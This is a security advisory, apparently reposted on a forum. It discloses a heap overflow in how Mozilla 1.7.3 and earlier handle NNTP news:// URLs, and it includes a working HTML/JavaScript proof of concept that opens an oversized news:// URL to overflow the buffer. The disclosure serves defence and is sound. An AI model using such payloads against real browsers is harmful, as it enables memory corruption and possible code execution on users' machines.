Issue:
======
A critical security vulnerability has been found in Mozilla Project code handling NNTP protocol.
Details:
========
Mozilla browser supports NNTP urls. Remote side is able to trigger
news:// connection to any server. I found a flaw in NNTP handling code which may cause heap overflow and allow remote attacker to execute arbitrary code on client machine.
Affected Versions
=================
Mozilla Browser <= 1.7.3 with mozilla-mail
Solution
=========
This bug is fixed in Mozilla 1.7.5. (Bug 264388) Mozilla developer Dan Veditz claims that it cannot be exploitable: "A '\' on the end will certainly trash memory, but at that point you're no
longer reading attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code overflows the buffer using attacker-supplied data. I decided to make this bug public because Mozilla Team hasn't warned users.
Proof of Concept
============
<html >
<script >
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
i=i+"A";
i=i+"\\";
window.open(i);
</script >
</html >
Reply With Quote